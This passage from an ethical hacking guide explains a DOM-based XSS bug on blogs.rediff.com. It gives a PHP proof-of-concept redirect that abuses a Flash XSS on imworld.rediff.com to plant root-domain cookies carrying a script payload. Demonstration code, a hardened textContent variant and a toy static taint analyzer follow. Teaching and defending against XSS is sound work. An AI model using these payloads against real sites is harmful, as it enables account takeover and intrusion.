Ethical Hacking and Penetration Testing Guide
Vulnerable code
The getcookie function fetches the value of a named cookie.
Two variables, rlo and rm, are then defined: rlo is set to getcookie("Rlo") and rm to getcookie("Rm"). Both now hold cookie values, which are user-controllable input. For exploitation, neither value may be null, which is what the if clause checks. Finally, the rlo value is written to the page through the innerHTML sink, so any markup it contains is parsed and rendered as HTML.
To exploit this, we need some other XSS on any subdomain of the site we are attacking, in this case rediff.com, so that we can manipulate the cookies. Using that XSS we set a root-domain cookie (domain=.rediff.com), which the browser sends to every subdomain. A root-domain cookie carrying the XSS vector does the trick: getcookie reads the Rlo cookie's value and it executes under blogs.rediff.com, the domain hosting the vulnerable JavaScript.
The researcher found a Flash-based XSS on the subdomain imworld.rediff.com.
POC
<?php
// Redirects the victim into the Flash-based XSS on imworld.rediff.com. The injected
// script sets two cookies scoped to .rediff.com and then sends the browser on to
// blogs.rediff.com, where the vulnerable code reads them.
header('Location: http://imworld.rediff.com/livewirerediff/pix/swfupload.swf#?movieName="]);}catch(e){}document.cookie="Rm=notnull; domain=.rediff.com;Path=/;";document.cookie="Rlo=onload=alert(\'XSS\')>;domain=.rediff.com;Path=/;";location="http://blogs.rediff.com/nonexistentpage";//');
?>
The injected script first sets the cookie Rm to "notnull" and Rlo to our XSS vector, both scoped to .rediff.com, and then redirects to blogs.rediff.com/nonexistentpage, where the vulnerable JavaScript is hosted. That code reads both cookies, finds neither null, and writes Rlo through innerHTML, so our payload executes in the blogs.rediff.com origin.
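The pattern described above, as an added example that is not the book's code: the vulnerable script on blogs.rediff.com is not reproduced on this page, so the getcookie/innerHTML logic below is reconstructed from the description, a hardened variant that writes through textContent is placed beside it, and a small domain-match function shows why a cookie set with domain=.rediff.com from imworld.rediff.com is delivered to blogs.rediff.com. The Cookie header, the <img onerror> payload and the fake DOM element are constructed for the demonstration; it runs under Node without a browser.

```javascript
// Added example (not the book's code): the getcookie -> innerHTML pattern the
// text describes, reconstructed from the description, plus the cookie domain
// matching that makes a root-domain cookie reach blogs.rediff.com. A fake
// element stands in for the DOM so this runs under Node.

// Returns the value of the named cookie from a Cookie header string, or null
// when the cookie is absent (the null check in the vulnerable code relies on this).
function getcookie(cookieHeader, name) {
  for (const part of cookieHeader.split(';')) {
    const [key, ...rest] = part.trim().split('=');
    if (key === name) return rest.join('=');
  }
  return null;
}

// Minimal stand-in for a DOM element: records what each sink received.
function fakeElement() {
  return { innerHTML: '', textContent: '' };
}

// Vulnerable version: if both cookies are present, Rlo goes through innerHTML,
// so any markup the attacker planted in the cookie is parsed as HTML.
function renderVulnerable(cookieHeader, el) {
  const rlo = getcookie(cookieHeader, 'Rlo');
  const rm = getcookie(cookieHeader, 'Rm');
  if (rlo !== null && rm !== null) {
    el.innerHTML = rlo; // HTML sink fed by user-controlled input
  }
  return el;
}

// Hardened version: same logic, but the value is written as text. The browser
// never parses it as markup, so the cookie can no longer inject script.
function renderHardened(cookieHeader, el) {
  const rlo = getcookie(cookieHeader, 'Rlo');
  const rm = getcookie(cookieHeader, 'Rm');
  if (rlo !== null && rm !== null) {
    el.textContent = rlo; // text sink: '<' and '>' stay literal
  }
  return el;
}

// Simplified RFC 6265 domain matching: a cookie whose Domain attribute is
// rediff.com (a leading dot is ignored) is sent to rediff.com and to every
// host under it. That is why a cookie set from imworld.rediff.com with
// domain=.rediff.com reaches blogs.rediff.com, while a cookie scoped to
// imworld.rediff.com itself would not.
function cookieSentTo(host, cookieDomain) {
  const d = cookieDomain.replace(/^\./, '').toLowerCase();
  const h = host.toLowerCase();
  return h === d || h.endsWith('.' + d);
}

// Constructed Cookie header as blogs.rediff.com would see it after the attacker
// set both root-domain cookies. The payload is a sample vector, not the book's.
const ATTACK_COOKIES = "Rm=notnull; Rlo=<img src=x onerror=alert('XSS')>; sid=abc123";

// Only one of the two cookies present: the if clause keeps the sink untouched.
const PARTIAL_COOKIES = "Rlo=<img src=x onerror=alert('XSS')>; sid=abc123";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderVulnerable(ATTACK_COOKIES, fakeElement()).innerHTML);
  console.log(renderHardened(ATTACK_COOKIES, fakeElement()).textContent);
  console.log(cookieSentTo('blogs.rediff.com', '.rediff.com'));        // true
  console.log(cookieSentTo('blogs.rediff.com', 'imworld.rediff.com')); // false
}
```

The hardened variant is the minimal fix for this sink; a fuller fix would also stop trusting the cookie as a source at all, since any subdomain on rediff.com can write root-domain cookies.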
Static JS Analysis to Identify DOM-Based XSS
As mentioned earlier, analyzing JavaScript by hand can be taxing, since you may have a million lines of code to read. Manual inspection does not scale, so static code analyzers can be used to find DOM-based XSS vulnerabilities. Let's take a look at a static JavaScript analysis tool called JSPrime, introduced by Nishant Das Patnaik.
JSPrime is a static source code analysis tool, itself written in JavaScript, for finding vulnerabilities in JavaScript. Built on an ECMAScript parser, it can identify DOM-based XSS in plain JavaScript and can also analyze code that uses libraries such as jQuery and YUI.
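To show what a static analyzer like JSPrime is doing, here is an added example written for this page (it is not JSPrime's code and does not use its parser): a small line-based source-to-sink tracker run over a constructed script in the shape of the vulnerable blogs.rediff.com code. The source and sink lists, the getcookie source name and the sample script are assumptions made for the demonstration; a real tool works on a parsed syntax tree rather than on lines.

```javascript
// Added example, not JSPrime's code: a deliberately small source-to-sink
// tracker showing the idea behind static DOM-XSS analysis. It reads one
// statement per line and understands only simple assignments, so it is a
// teaching model of taint propagation, not a parser-based analyzer.

// Sources: places where attacker-controlled data enters the script. getcookie
// is included because the vulnerable code described in the text reads cookies
// through it (the function name is taken from the text, the rest is assumed).
const SOURCES = [
  /document\.cookie/, /location\.(hash|search|href)/, /document\.URL/,
  /document\.referrer/, /getcookie\s*\(/,
];

// Sinks: places where a string is interpreted as HTML or as code.
const SINKS = [
  { name: 'innerHTML', re: /\.innerHTML\s*=/ },
  { name: 'outerHTML', re: /\.outerHTML\s*=/ },
  { name: 'document.write', re: /document\.write(ln)?\s*\(/ },
  { name: 'eval', re: /\beval\s*\(/ },
];

// Simple assignment: optional var/let/const, an identifier, a single '='.
const ASSIGN = /^\s*(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.+?);?\s*$/;

// True when the expression reads a source directly or names a tainted variable.
function mentionsTaint(expr, tainted) {
  if (SOURCES.some((re) => re.test(expr))) return true;
  for (const v of tainted) {
    const re = new RegExp('\\b' + v.replace(/\$/g, '\\$') + '\\b');
    if (re.test(expr)) return true;
  }
  return false;
}

// Walks the script top to bottom. A variable becomes tainted when its
// right-hand side reads a source or another tainted variable, and is cleared
// when it is reassigned from clean data. A finding is recorded when a sink
// receives a tainted expression.
function analyze(script) {
  const tainted = new Set();
  const findings = [];
  script.split('\n').forEach((raw, idx) => {
    const line = raw.replace(/\/\/.*$/, ''); // drop trailing line comments
    const m = line.match(ASSIGN);
    if (m) {
      if (mentionsTaint(m[2], tainted)) tainted.add(m[1]);
      else tainted.delete(m[1]);
    }
    for (const sink of SINKS) {
      if (!sink.re.test(line)) continue;
      // What reaches the sink: the right-hand side for property sinks, or the
      // whole call expression for function-style sinks such as document.write.
      const eq = line.indexOf('=');
      const flowing = eq >= 0 ? line.slice(eq + 1) : line;
      if (mentionsTaint(flowing, tainted)) {
        findings.push({ line: idx + 1, sink: sink.name, code: raw.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample in the shape of the vulnerable blogs.rediff.com script
// described in the text, plus a second flow through location.hash.
const SAMPLE = [
  'var rlo = getcookie("Rlo");',
  'var rm = getcookie("Rm");',
  'var title = "Recent posts";',
  'if (rlo != null && rm != null) {',
  '  document.getElementById("box").innerHTML = rlo; // tainted -> HTML sink',
  '}',
  'document.getElementById("hdr").innerHTML = title; // clean -> no finding',
  'document.getElementById("box").textContent = rlo; // text sink, not flagged',
  'var h = location.hash.substring(1);',
  'var msg = "Hello " + h;',
  'document.write(msg); // tainted through msg -> HTML sink',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of analyze(SAMPLE)) {
    console.log('line ' + f.line + ': tainted data reaches ' + f.sink + ' | ' + f.code);
  }
}
```

Run stand-alone it reports two flows: line 5 (cookie value into innerHTML, the bug from the previous page) and line 11 (location.hash through msg into document.write). The textContent write on line 8 and the clean title on line 7 are correctly left alone. Notice what the toy does not model and a real analyzer must: sanitizer functions, string operations that neutralize markup, branches, and data passed through function calls or object properties.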